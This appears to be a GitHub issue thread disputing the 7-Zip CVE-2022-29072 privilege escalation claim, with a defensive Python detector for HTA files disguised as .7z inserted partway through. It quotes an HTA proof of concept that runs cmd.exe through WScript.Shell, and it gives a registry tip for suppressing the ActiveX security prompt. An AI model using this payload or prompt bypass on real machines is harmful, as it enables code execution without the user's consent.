kagancapar / CVE-2022-29072

7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.
GNU General Public License v3.0

I can't reproduce #8

Open Easthrone opened 2 years ago

Easthrone commented 2 years ago

I can't reproduce the problem described in your video. What is the "privese.exe"? Is this what caused it?

HenkPoley commented 2 years ago

Most probably there is no issue.

If there actually is a privilege escalation, that bug is not an issue with 7zip or Microsoft® HTML Help Executable (HH.exe). But with Microsoft Windows.

Kağan Çapar keeps posting different explanations. The common theme for that would be that there actually is no issue. He probably just tries to make up a cloud of plausibility.

Kağan Çapar posted this file to Tavis Ormandy (from Google Zero). If you extract it, it might hose your NTFS (older Windows), or just drop hard to remove files ("just some naïve attempt at directory traversal that couldn't possibly work"). The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

7zip by default does not run with elevated privileges. It should not be able to get them by itself. Unless there is an issue with Windows. If 7zip can do it, other programs should be able to as well.

If there is a bug, it is not a bug in 7zip.

kagancapar commented 2 years ago

That file doesn't even belong to me. I've been making fun of Tavis since yesterday; I don't have to send him the payload.

liudonghua123 commented 2 years ago

I could not reproduce either. When I try to drag a 7z file into the chm content window, I only get "Do you want to open or save this file?".

https://user-images.githubusercontent.com/2276718/164577605-e8596058-1f04-4970-a97d-1212bca978d9.mp4

liudonghua123 commented 2 years ago

I created an HTML file which contains the public POC in https://dl.packetstormsecurity.net/2204-exploits/7zip-escalate.txt and renamed it to a 7z file. Then I got a warning. When I click yes, I can only get the current user shell, not the system user shell.

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
</html>


https://user-images.githubusercontent.com/2276718/164581174-2fcafd9f-9863-4c6c-8059-dabc302bf513.mp4

I also tried to drag the HTML file to the chm content window. IT IS THE SAME.
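As an added defensive example (not code from the thread or from 7-Zip), this Python check flags a file carrying the .7z extension whose content is actually HTML/HTA, as in the renamed PoC above, by comparing the first bytes against the 7z archive signature. The sample inputs are constructed here.

```python
import re
import sys

# Every genuine 7z archive starts with this six-byte signature ('7z' + BC AF 27 1C).
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"

# Markup that identifies HTML/HTA content: optional UTF-8 BOM, optional
# whitespace, then a doctype, <html>, <hta:application> or <script> tag.
HTML_MARKERS = re.compile(
    rb"^(?:\xef\xbb\xbf)?\s*<(?:!doctype\s+html|html|hta:application|script)\b",
    re.IGNORECASE,
)


def classify_7z(data: bytes) -> str:
    """Classify the leading bytes of a file that claims to be a .7z archive.

    Returns 'archive' for a real 7z signature, 'html-masquerade' when the
    content is HTML/HTA wearing a .7z extension, and 'unknown' otherwise.
    """
    if data.startswith(SEVENZ_MAGIC):
        return "archive"
    if HTML_MARKERS.search(data[:512]):
        return "html-masquerade"
    return "unknown"


def check_file(path: str) -> str:
    """Read only the header of the file at `path` and classify it."""
    with open(path, "rb") as fh:
        return classify_7z(fh.read(512))


# Constructed samples: a minimal 7z header (signature, version 0.4, zeroed
# start-header fields) and the HTA body quoted in this thread.
SAMPLE_7Z = SEVENZ_MAGIC + b"\x00\x04" + b"\x00" * 24
SAMPLE_HTA = (
    b'<html>\n<head>\n<HTA:APPLICATION ID="7zipcodeexec">\n'
    b'<script language="jscript">\nvar c = "cmd.exe";\n'
    b"new ActiveXObject('WScript.Shell').Run(c);\n</script>\n</head>\n</html>\n"
)

if __name__ == "__main__":
    for name in sys.argv[1:]:
        print(f"{name}: {check_file(name)}")
```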

brlin-tw commented 2 years ago

@kagancapar

That file doesn't even belong to me. I've been making fun of Tavis since yesterday; I don't have to send him the payload.

Regardless of what that actually means, I've made a Wayback Machine backup for future reference, cheers!

kagancapar commented 2 years ago

Most probably there is no issue.

If there actually is a privilege escalation, that bug is not an issue with 7zip or Microsoft® HTML Help Executable (HH.exe). But with Microsoft Windows.

Kağan Çapar keeps posting different explanations. The common theme for that would be that there actually is no issue. He probably just tries to make up a cloud of plausibility.

Kağan Çapar posted this file to Tavis Ormandy (from Google Zero). If you extract it, it might hose your NTFS (older Windows), or just drop hard to remove files ("just some naïve attempt at directory traversal that couldn't possibly work"). The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

7zip by default does not run with elevated privileges. It should not be able to get them by itself. Unless there is an issue with Windows. If 7zip can do it, other programs should be able to as well.

If there is a bug, it is not a bug in 7zip.

Even though I said that this file does not belong to me, you still continue to talk as if it is mine. I don't take you seriously; don't waste your breath for nothing. Don't stop insulting me on Twitter. We are not even in the same class. I'm posting the link again: this file is not mine; it was purely done to troll Tavis.

https://tweetstamp.org/1515691512553742347

kagancapar commented 2 years ago

I created an HTML file which contains the public POC in https://dl.packetstormsecurity.net/2204-exploits/7zip-escalate.txt and renamed it to a 7z file. Then I got a warning. When I click yes, I can only get the current user shell, not the system user shell.

<html>
<head>
<HTA:APPLICATION ID="7zipcodeexec">
<script language="jscript">
var c = "cmd.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
</html>


I also tried to drag the HTML file to the chm content window. IT IS THE SAME.

This is not the PoC code of the privesc attack. Also, a tip for you to bypass the ActiveX prompt before working inside the payload: under [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] it checks "1201"=dword:00000000; if this DWORD has a value of 1, it sets it to 0 and the popup will be bypassed.

brlin-tw commented 2 years ago

@kagancapar

(...stripped...) The file is made by/for jasonLyk. It does not show this exploit. It shows a different issue.

Even though I said that this file does not belong to me, you still continue to talk as if it is mine.

False. Even Tavis themself has clearly attributed it correctly:

When I told him that, he said "that file doesn't belong to me anyway" - then explained he was planning his wedding and was too busy to answer more questions.

-- source

I'm posting the link again: this file is not mine; it was purely done to troll Tavis.

I fail to see how that behavior would help anyone.